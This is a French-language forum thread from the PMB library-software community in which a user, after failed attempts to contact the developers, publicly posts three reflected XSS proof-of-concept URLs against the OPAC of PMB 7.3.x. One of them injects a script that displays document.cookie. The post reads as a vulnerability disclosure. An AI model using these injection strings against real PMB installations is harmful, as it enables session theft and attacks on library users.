Charte des bonnes pratiques sur PMB Community et PMB Community Forums

Signalement de bugs

LescaphLescaph
dans Installations
Bonjour,
Je me suis inscrit sur la forge mais je n'ai pas trouvé comment rapporter un bug. Quelqu'un saurait-il m'indiquer la marche à suivre ?
Il s'agit de failles XSS dans l'Opac.
Merci.

Réponses

  • LescaphLescaph
    Bonjour,
    Je remonte cette discussion car je n'ai pas eu de réponses à mes différentes tentatives de communication, soit par mail, soit via ce forum.
    A tout hasard je poste ici les requêtes qui déclenchent les erreurs XSS pour les dernières versions de PMB 7.3.x
    • [url_du_site]/opac_css/do_resa.php?id_bulletin=x'><svG onLoad=prompt(9)>&id_notice=21846&lvl=resa&oresa=popup
    • [url_du_site]/opac_css/index.php?id=456&l_typdoc=&lvl=categ_see&nb_per_page_custom=25&nbr_lignes=x"><svG onLoad=alert(4)>&page=1
    • [url_du_site]/opac_css/cart_info.php?id=</ScriPt><sCripT class=xss>alert(document.cookie)</sCriPt>






Connectez-vous ou Inscrivez-vous pour répondre.